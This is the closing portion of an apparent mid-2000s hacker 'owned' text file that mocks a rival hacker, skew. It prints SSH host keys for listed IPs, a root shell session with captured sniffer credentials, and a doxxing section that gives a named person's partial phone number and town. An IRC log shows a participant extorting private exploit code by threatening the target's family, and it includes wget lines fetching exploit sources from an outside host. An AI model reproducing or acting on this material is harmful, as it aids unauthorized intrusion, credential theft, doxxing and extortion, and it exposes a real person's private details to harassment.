AAAAB3NzaC1kc3MAAACBAI8sMZ1S3TQwwfGsik4RYpV3vLW98Naw6fHIr1LfHtnl4/eo+hqO1NQk06K+byQhoJACDKhjItSx9hFY5kAcLxsYVVWzl3dyS5SDFyANwv3hahs5WuBV1EOeDHmiJxt0WEKwOhDh1LyC8tcZ7FNmEqJnww/qV7HXSvzrRlcI56pNAAAAFQD1njp3oASgeLw38PEmkFekPTZY6QAAAIBW7uqkiGXia5lVZQeoGPxoxQFcjJfbgX2iykhO3zboYWy6jqOIeWxK4GwwDUVh8Xnf/BKPiOo9reEfPtqsd9Q7+4EE8JzkrXDBgxOZ3hBBqu3L1sLbuAHIfZKSce4G/bXQ8GCYF8r73UvMWKEdkHcKW5vDSzPFUrGXXZh5GZ/CJAAAAIAMi06vDOokgR+LV4mWBOfpZisVCs16/hKJmPK0HtG61zG1LWirE+69VrICVC+NLyyXYjEHrw7S2bmuT+bs3VKAiMIpfmpusPYBYbKHcdg0oVY2H3l/hh6PIPntozYRnswejcocjOayvTM8YtkL8BKkey4anuaF/jRJ5de1xj1PVw==
localhost ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEAzyeC8l1kKcYyG9b+ivtIaWyl9a2uLFbgUNq1h53MrLASfGQNIoFtSolXG0DsXs1qZPewceTRRT3+DNiarmHpoUYRxu3UX4ZqkJR88nbSMOQLq0x/oNULWlTwfm1lDq2eJdRT1UyH1tP/EeBbUiqVplG9xn9ytA2jWZY2JgEO2GU=
196.15.249.207 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEAnRLlmrqsBVpPKzy+ycibPbk/8Yo146BYtGSmrEuXxyiKFHiQ28qAHOr1DK1LNVqHRNwe0XJcwqF0MWneLDoNRAjElSxEoqGnhXgYXgLhTgjSVyafBjNAQk000tQ/0MIrYmRBQ7JFIMMNQaCcA45LKAlJ5xaAyG75v+KEHS5Vha8=
196.25.45.214 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEAu8yQRg6T0fKpqMTk3aoM4SByqGs0MRp9vJkBhHxK0jat6ILJCd+xv9vQx0yL+mGs36jlCS3r07NL/16fOgd11u2JYMlQwsvi2eRQTDinXFNUmqa26viW8Vx8n8L1+EwVEJzgJUrlr8M3uIhz0nRs0wTKreLRfPgk/WEmCDlfeCM=
127.0.0.1 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEAzyeC8l1kKcYyG9b+ivtIaWyl9a2uLFbgUNq1h53MrLASfGQNIoFtSolXG0DsXs1qZPewceTRRT3+DNiarmHpoUYRxu3UX4ZqkJR88nbSMOQLq0x/oNULWlTwfm1lDq2eJdRT1UyH1tP/EeBbUiqVplG9xn9ytA2jWZY2JgEO2GU=
[root@knysna root]# cd /var /run
[root@knysna run]# ./ma sshd.sync
2to: 127.0.0.1 user: ls pass: ss
2to: 127.0.0.1 user: ls pass: s
2to: 127.0.0.1 user: ls pass: s
[root@knysna run]# cat /etc/hosts
127.0.0.1localhost
[root@knysna run]# logout
===========================================
> From these shells we notice a few things:
1: that tal0n sets up ssheist (his ssh sniffer)
2: he usually makes an dir /.../ in /tmp/ so if you have something like /tmp/.../ you
have been owned by skew.
but thats fucking impossible unless youre a complete dumbshit.
3: skew cant hack.
============================================
[5] GET SKEWS DOCS ;)
1-304-475-****
skew = Jeremy Brown
Jerry F Colegrove - (304) 475-**** - , Lenore, WV 25676
[6] MAKE HIM HAND HIS CODE OVER :D
00:50 <m0hawk> so you want peace.
00:51 <skew> yes
00:51 <skew> thats all i ever wanted
00:51 <m0hawk> we want some code.
00:51 <m0hawk> in exchange.
00:51 <m0hawk> 0day code.
00:51 <m0hawk> as a peace offering.
00:51 <m0hawk> and in return, no one else will hassle you/your parents/your grand parents
00:51 <skew> i dont have much.. a few things ive coded
00:51 <skew> will that be sufficent?
00:51 <m0hawk> well, hook up.
00:52 <m0hawk> it should, yes, as long as its all good
00:52 <skew> hold
00:52 <skew> its what i coded, what i got heh
00:52 <skew> dcc?
00:52 <skew> er
00:52 <skew> hold ill give u www
00:53 <m0hawk> alright.
00:53 <m0hawk> although i would prefer dcc.
00:53 <skew> dcc is fucked here router sucks sorry
00:54 <skew> wget http://skew.blackhat.ru/oboom.c
00:54 <m0hawk> alright.
00:55 <skew> as far as 0day, thats what i got
00:55 <skew> i code private things from pub advs alot
00:56 <skew> but you said 0day so thats all ive written atm
00:56 <m0hawk> well, hook up.
00:56 <m0hawk> private is close.
00:56 <skew> ok
00:56 <m0hawk> do you still run skewtty.dyndns.org?
00:57 <skew> nope
00:57 <m0hawk> 2 private exploits. and then an apology, a PUBLIC apology on your website,
to xtix.
00:57 <m0hawk> well, issue a public apology on blackhat.ru.
00:57 <skew> wget http://skew.blackhat.ru/shoutdead.c
00:57 <skew> wget http://skew.blackhat.ru/imap4life.pl
00:57 <m0hawk> shoutdead is old.
00:58 <skew> hrm
00:59 <skew> wget http://skew.blackhat.ru/gotfault-newspost.c
00:59 <m0hawk> alright, its cool. but the last part now.
[7] State a public appology to a freind.
00:57 <m0hawk> a PUBLIC apology on your website, to xtix.
01:03 <m0hawk> paste the link to apology in #darpa on here
01:03 <m0hawk> #phrack and #darknet at efnet.
01:05 <skew> * #phrack :Nick/channel is temporarily unavailable
Jul 07 02:06:44 --> You are now talking on #darknet
Jul 07 02:06:45 --- Topic for #darknet is love everyone, don't be under the influence of
the Illuminati and have hate and ware in mind,Ocultism is a form of 'maya
Jul 07 02:06:45 --- Topic for #darknet set by SoftIce!awk@hella.secret at Wed Jul 06
07:10:35 2005
Jul 07 02:06:52 <skew> http://skew.blackhat.ru/news.html
Jul 07 02:06:54 <-- skew has quit (Client Quit)
Jul 07 01:14:11 --> You are now talking on #darpa
Jul 07 01:14:11 --- Topic for #darpa is skew... ew
Jul 07 01:14:11 --- Topic for #darpa set by camel at Wed Jul 06 17:52:55 2005
Jul 07 02:05:05 <skew> http://skew.blackhat.ru/news.html
Jul 07 02:10:25 <-- skew has quit (Quit: nite *)
================ EOF
=========================================================================================
I hope skew has learned from all of this not to talk shit about people dont fuck over
youre freinds (you know how it feels now.)
stop coding shit, stop the lies admit youre tal0n and dont think you are better than
people. you are not.
NEWS: skew has changed nicks once again but.... ill let you find him youre self its as
easy as eating bread. ;)
=============================================================================================================
Reference in a new issue View git blame Copy permalink